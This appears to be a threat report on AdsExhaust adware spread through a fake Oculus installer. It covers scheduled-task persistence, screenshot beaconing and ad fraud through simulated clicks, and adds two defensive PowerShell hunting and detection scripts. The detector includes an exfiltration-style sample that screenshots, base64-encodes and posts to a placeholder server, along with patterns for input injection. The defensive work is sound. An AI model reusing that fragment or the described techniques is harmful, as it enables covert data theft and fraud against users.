In June 2024 a fake Oculus installer was used to distribute adware named AdsExhaust, which exfiltrates screenshots and drives the browser with simulated keystrokes and clicks. By automating clicks and redirects it generates ad-fraud revenue for the attackers, and the same synthetic input could potentially be used to bypass user authentication prompts.
A malicious website aimed at people searching for the Oculus app tricks them into downloading an archive that contains an initial batch script named “oculus-app.EXE”. When run, it contacts a command-and-control server and downloads a second batch script, “backup.bat”, which in turn retrieves a third, “update.bat”; the scripts are registered as scheduled tasks so that they run at set times.
The initial script also downloads what appears to be the legitimate Oculus application from a suspicious URL, so the victim still gets the installer they were looking for.
backup.bat acts as a downloader and task scheduler: it retrieves further, likely malicious, scripts written in VBScript and PowerShell and drops them into the user’s profile under AppData\Local\wespmail.
It then creates new scheduled tasks that run the dropped scripts repeatedly, which gives the attacker persistence on the compromised system.
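The persistence described above (scheduled tasks launching scripts from AppData\Local\wespmail) can be hunted for directly from the Task Scheduler. The following is an added example written for this page, not code from the article or from eSentire TRU: it enumerates scheduled tasks and flags any whose action references the “wespmail” directory from the report or launches a script interpreter from under the user’s AppData directory. The directory name comes from the report; the interpreter list and the AppData heuristic are assumptions of mine.

```powershell
# Added example (not the article's or eSentire's code): hunt for scheduled tasks
# that launch a script interpreter from under the user's AppData directory, the
# persistence pattern used by the AdsExhaust chain. "wespmail" is the directory
# named in the report; the interpreter list is an assumption. Run as an
# administrator so that every user's tasks are visible.
function Find-SuspiciousUserTasks {
    param(
        [string[]] $SuspectDirs  = @('wespmail'),
        [string[]] $Interpreters = @('powershell.exe', 'pwsh.exe', 'cmd.exe',
                                     'wscript.exe', 'cscript.exe', 'mshta.exe')
    )

    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            # Only MSFT_TaskExecAction carries Execute/Arguments; skip COM-handler actions.
            if (-not $action.Execute) { continue }

            $cmdLine = ("$($action.Execute) $($action.Arguments)").Trim()
            $exeName = [IO.Path]::GetFileName($action.Execute.Trim('"'))

            $isInterpreter = $Interpreters -contains $exeName
            $fromAppData   = $cmdLine -match '\\AppData\\(Local|Roaming)\\'
            $dirHits       = @($SuspectDirs | Where-Object { $cmdLine -match [regex]::Escape($_) })

            if ($dirHits.Count -eq 0 -and -not ($isInterpreter -and $fromAppData)) { continue }

            $reason = if ($dirHits.Count) { "references $($dirHits -join ', ')" }
                      else { 'interpreter launched from AppData' }
            $info = Get-ScheduledTaskInfo -TaskName $task.TaskName -TaskPath $task.TaskPath

            [pscustomobject]@{
                Task        = $task.TaskPath + $task.TaskName
                RunsAs      = $task.Principal.UserId
                State       = $task.State
                CommandLine = $cmdLine
                # Trigger class names show whether the task fires at logon, on a timer, etc.
                Triggers    = ($task.Triggers | ForEach-Object {
                                  $_.CimClass.CimClassName -replace '^MSFT_Task', '' }) -join ', '
                LastRun     = $info.LastRunTime
                NextRun     = $info.NextRunTime
                Reason      = $reason
            }
        }
    }
}

# Usage: list the hits, then collect the referenced script files for analysis.
Find-SuspiciousUserTasks | Format-Table -AutoSize -Wrap
```

Legitimate software occasionally schedules updaters from AppData, so treat the AppData heuristic as a triage filter; the combination of an interpreter, a user-writable path and a short repeating trigger is what makes an entry worth pulling the script for.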
One scheduled task launches a PowerShell script that loops for about 9 minutes. Each iteration fetches the host’s IP information, captures a screenshot, and checks a specific log file, base64-encoding any new content and incrementing a counter when the file has changed.
The script also collects system details and file metadata from a designated directory, bundles these with the base64-encoded screenshot and log changes into a JSON payload, sends the payload to a remote server and modifies a local file according to the response.
It searches the response for a specific marker string, extracts and encodes whatever follows it, and stores that in another file. After deleting the screenshot and sleeping for 15 seconds, the loop restarts.
The AdsExhaust adware itself is delivered as a PowerShell payload. It checks that Microsoft Edge is running and that the user has been idle for more than 9 minutes; once both conditions hold, it injects clicks, opens new tabs on embedded URLs and scrolls the pages erratically.
These actions simulate user interaction in order to trigger ads for fraudulent revenue, and the clicks land at random points within specific coordinate ranges, which suggests the script is targeting known ad placements on the page.
According to the eSentire Threat Response Unit (TRU), it employs several techniques to manipulate user interaction and generate fraudulent ad revenue, and it keeps monitoring for user activity so that it can close the browser window as soon as the user returns.
The adware then captures a screenshot and creates an overlay to mask its actions; if Microsoft Edge is open, it searches the page for the word “sponsored” and attempts to click on it.
It also retrieves keywords from a malicious server and uses them to run Google searches in Edge. Together with the idle-time check and the overlay, this lets AdsExhaust generate revenue for the attackers while the user is away from the machine and unlikely to notice.
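The beacon loop (screenshot, base64, JSON payload, 15-second sleep) and the ad-fraud routine (idle-time check, synthetic input aimed at Edge, the hunt for “sponsored”) are both PowerShell, so PowerShell script block logging (Event ID 4104) is the natural place to look for them. The following is an added example written for this page, not code from the article or from eSentire TRU: it scores a script’s text against those behaviours and applies that scoring to 4104 events. The behaviours come from the report; the concrete API names matched for each one (CopyFromScreen, GetLastInputInfo, SendKeys/SendInput and so on) are the usual ways to implement them in PowerShell and are my assumption, as are the threshold of 4 and the sample fragments at the end, which are constructed for the offline check and are not the real payload.

```powershell
# Added example (not the article's or eSentire's code): score PowerShell script
# text for the behaviour combination described above and apply the scoring to
# script block log events. API names per indicator and the threshold are
# assumptions; script block logging must be enabled for the log query to work.
function Get-AdFraudIndicators {
    param([Parameter(Mandatory)][string] $ScriptText)

    $indicators = [ordered]@{
        Screenshot    = 'CopyFromScreen|System\.Drawing\.Bitmap'
        Base64        = '\[Convert\]::ToBase64String'
        JsonPayload   = 'ConvertTo-Json'
        HttpBeacon    = 'Invoke-RestMethod|Invoke-WebRequest|Net\.WebClient|HttpClient'
        FifteenSecond = 'Start-Sleep\s+(-s(econds)?\s+)?15\b'
        IdleCheck     = 'GetLastInputInfo|LASTINPUTINFO'
        InputInject   = 'SendKeys|SendInput|keybd_event|mouse_event|SetCursorPos'
        EdgeTarget    = 'msedge'
        SponsoredHunt = 'sponsored'
    }

    # -match is case-insensitive in PowerShell, which is what we want here.
    $hits = @($indicators.Keys | Where-Object { $ScriptText -match $indicators[$_] })
    [pscustomobject]@{ Score = $hits.Count; Matched = $hits }
}

function Find-AdFraudScriptBlocks {
    param([int] $Threshold = 4, [int] $MaxEvents = 5000)

    # 4104 carries the script text in its third property. Long scripts are split
    # across several 4104 events, so one event may show only part of the behaviour.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text   = [string]$_.Properties[2].Value
            $result = Get-AdFraudIndicators -ScriptText $text
            if ($result.Score -ge $Threshold) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Score   = $result.Score
                    Matched = $result.Matched -join ', '
                    Path    = $_.Properties[4].Value
                    Preview = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

# Constructed sample fragments for an offline check. They are not the real
# payload, only the calls a script with the described behaviour would contain.
$suspect = @'
[System.Drawing.Graphics]::FromImage($bmp).CopyFromScreen(0, 0, 0, 0, $bmp.Size)
$shot = [Convert]::ToBase64String([IO.File]::ReadAllBytes($png))
$body = @{ h = $env:COMPUTERNAME; s = $shot } | ConvertTo-Json
Invoke-RestMethod -Uri $server -Method Post -Body $body
Start-Sleep -Seconds 15
'@
$benign = @'
$report = Get-Service | Select-Object Name, Status | ConvertTo-Json
Invoke-RestMethod -Uri 'https://monitoring.example.internal/api' -Method Post -Body $report
'@

Get-AdFraudIndicators -ScriptText $suspect
Get-AdFraudIndicators -ScriptText $benign
```

On the constructed input the suspect fragment matches five indicators (Screenshot, Base64, JsonPayload, HttpBeacon, FifteenSecond) and the benign monitoring script only two (JsonPayload, HttpBeacon), which is why the scoring counts distinct behaviours rather than alerting on any single call: JSON beacons and REST calls are ordinary in administrative scripts, while a screenshot plus an idle-time check plus synthetic input in the same script is not.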